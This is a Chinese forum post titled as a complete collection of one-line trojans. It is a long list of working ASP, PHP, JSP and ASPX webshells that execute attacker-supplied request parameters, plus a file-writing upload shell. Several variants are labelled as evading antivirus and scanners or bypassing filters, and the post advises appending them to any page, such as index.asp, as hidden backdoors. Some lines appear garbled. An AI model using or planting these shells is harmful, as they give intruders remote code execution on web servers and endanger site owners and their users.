盼盼资源网-亲测资源网-盼盼的家园www.panpan.org

 找回密码
 立即注册
查看: 24|回复: 0

[普通] 各种一句话木马大全

[复制链接]

1554

主题

1608

帖子

40万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
405496
发表于 2019-10-9 15:20:02 | 显示全部楼层 |阅读模式
  1. 各种一句话木马大全:

  2. <%eval request("c")%>
  3. <%execute request("c")%>
  4. <%execute(request("c"))%>
  5. <%ExecuteGlobal request("sb")%>
  6. %><%Eval(Request(chr(35)))%><%
  7. <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%>
  8. <%eval(Request.Item["c"],"unsafe");%>
  9. '备份专用
  10. <%eval(request("c")):response.end%>
  11. '无防下载表,有防下载表突破专用一句话
  12. <%execute request("c")%><%<%loop<%:%>
  13. <%<%loop<%:%><%execute request("c")%>
  14. <%execute request("c")<%loop<%:%>
  15. '防杀防扫专用
  16. <%if Request("c")<>"" ThenExecuteGlobal(Request("c"))%>
  17. '不用"<,>"
  18. <script language=VBScript runat=server>execute request("c")</script>
  19. <% @Language="JavaScript" CodePage="65001"var lcx={'名字':Request.form('#'),'性别':eval,'年龄':'18','昵称':'请叫我一声老大'};lcx.性别((lcx.
  20. 名字)+'') %>
  21. <script language=vbs runat=server>eval(request("c"))</script>
  22. <script language=vbs runat=server>eval_r(request("c"))</script>
  23. '不用双引号
  24. <%eval request(chr(35))%>
  25. '可以躲过雷客图
  26. <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject"response",response ms.AddObject

  27. "request",request ms.ExecuteStatement("ev"&"al(request(""c""))")%>
  28. <%dy=request("dy")%><%Eval(dy)%>
  29. '容错代码
  30. if Request("sb")<>"" then ExecuteGlobal request("sb") end if
  31. PHP一句话

  32. <?php eval($_POST1);?>
  33. <?php if(isset($_POST['c'])){eval($_POST['c']);}?>
  34. <?php system($_REQUEST1);?>
  35. <?php ($_=@$_GET1).@$_($_POST1)?>
  36. <?php eval_r($_POST1)?>
  37. <?php @eval_r($_POST1)?>//容错代码
  38. <?php assert($_POST1);?>//使用Lanker一句话客户端的专家模式执行相关的PHP语句
  39. <?$_POST['c']($_POST['cc']);?>
  40. <?$_POST['c']($_POST['cc'],$_POST['cc'])?>
  41. <?php @preg_replace("/[email]/e",$_POST['h'],"error");?>/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:<O>h=@eval_r($_POST1);</O>
  42. <?php echo `$_GET['r']` ?>
  43. //绕过<?限制的一句话
  44. <script language="php">@eval_r($_POST[sb])</script>

  45. //绕过<?php ?>限制的一句话

  46. <?=eval($_POST['cmd']);

  47. JSP一句话

  48. <%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream (application.getRealPath("\")+request.getParameter("f"))).write (request.getParameter("t").getBytes());%>
  49. 提交客户端
  50. <form action="" method="post"><textareaname="t"></textarea><br/><input type="submit"value="提交"></form>
  51. ASPX一句话
  52. <script language="C#"runat="server">WebAdmin2Y.x.y a=new WebAdmin2Y.x.y("add6bb58e139be10")</script>

  53. 普通的php一句话:<?php @eval($_POST['r00ts']);?>
  54. 普通的asp一句话:<%eval(Request.Item["r00ts"],”unsafe”);%>
  55. aspx突破一流的:
  56. dim da
  57. set fso=server.createobject("scripting.filesystemobject")
  58. path=request("path")
  59. if path<>"" then
  60. data=request("da")
  61. set da=fso.createtextfile(path,true)
  62. da.write data
  63. if err=0 then
  64. Response.Write "yes"
  65. else
  66. Response.Write "no"
  67. end if
  68. err.clear
  69. end if
  70. set da=nothing
  71. set fos=nothing
  72. Response.Write "<form action=" method=post>"
  73. Response.Write "<input type=text name=path>"
  74. Response.Write "<br>"
  75. Response.Write "当前文件路径:"&server.mappath(request.servervariables("script_name"))
  76. Response.Write "<br>"
  77. Response.Write "操作系统为:"&Request.ServerVariables("OS")
  78. Response.Write "<br>"
  79. Response.Write "WEB服务器版本为:"&Request.ServerVariables("SERVER_SOFTWARE")
  80. Response.Write "<br>"
  81. Response.Write "<textarea name=da cols=50 rows=10 width=30></textarea>"
  82. Response.Write "<br>"
  83. Response.Write "<input type=submit value=save>"
  84. Response.Write "</form>"
  85. </Script>


  86. ASP一句话:<%IfRequest(“1″)<>”"ThenExecuteGlobal(Request(“1″))%>

  87. PHP防杀放扫 一句话:<?php (])?>
  88. 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错,比如
  89. index.asp里面也是可以的!

  90. 因为加了判断!加了判断的PHP一句话,与上面的ASP一句话相同道理,也是可以插在任何PHP文件
  91. 的最底部不会出错!<?if(isset($_POST['1'])){eval($_POST['1']);}?><?php system($_REQUEST[1]);?>

  92. 无防下载表,有防下载表可尝试插入以下语句突破的一句话
  93. <%execute request(“class”)%><%'<% loop <%:%><%'<% loop <%:%><%execute request(“class”)%><%execute request(“class”)'<% loop <%:%>


  94. 备份专用<%eval(request(“1″)):response.end%>
  95. asp一句话<%execute(request(“1″))%>
  96. aspx一句话:<scriptrunat=”server”>WebAdmin2Y.x.y aaaaa =newWebAdmin2Y.x.y(“add6bb58e139be10″);</script>

  97. 可以躲过雷客图的一句话。
  98. <%set ms = server.CreateObject(“MSScriptControl.ScriptControl.1″)
  99. ms.Language=”VBScript”ms.AddObject”Response”,Responsems.AddObject”request”,
  100. requestms.ExecuteStatement(“ev”&”al(request(“”1″”))”)%>

  101. 不用'<,>‘的asp一句话<scriptrunat=server>execute request(“1″)</script>

  102. 不用双引号的一句话。<%eval request(chr(35))%>


复制代码


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|民间故事|新华字典|周公解梦|实用工具|加密解密|便民服务|盼盼工具箱|闹钟|默笙工具箱|易经风水|Archiver|手机版|小黑屋|盼盼资源网